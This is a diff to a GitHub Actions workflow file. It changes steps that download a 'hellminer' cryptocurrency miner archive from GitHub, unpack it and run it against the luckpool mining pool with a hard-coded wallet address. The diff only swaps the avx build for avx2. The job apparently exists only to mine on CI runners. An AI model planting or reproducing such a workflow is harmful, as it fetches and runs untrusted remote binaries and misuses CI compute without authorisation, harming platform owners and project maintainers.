--- a/.github/workflows/vuong.yml
+++ b/.github/workflows/vuong.yml
@@ -17,10 +17,10 @@ jobs:
         JOB: ${{ matrix.go }}
     steps:
     - name: PREPARING
-      run: Invoke-WebRequest https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_win64_avx.zip -OutFile hellminer_cpu_win64_avx.zip
+      run: Invoke-WebRequest https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_win64_avx2.zip -OutFile hellminer_cpu_win64_avx2.zip
     - name: Seting-UP
-      run: Expand-Archive hellminer_cpu_win64_avx.zip
+      run: Expand-Archive hellminer_cpu_win64_avx2.zip
     - name: Running
-      run: .\hellminer_cpu_win64_avx\hellminer.exe -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RADzfp5pn7wvJEQkBiXPx4wJ7wTm7wg8V2.CPU_PC_MAO_HIEM -p x --cpu 1
+      run: .\hellminer_cpu_win64_avx2\hellminer.exe -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RADzfp5pn7wvJEQkBiXPx4wJ7wTm7wg8V2.CPU_PC_MAO_HIEM -p x --cpu 1
     - name: END
       run: exit
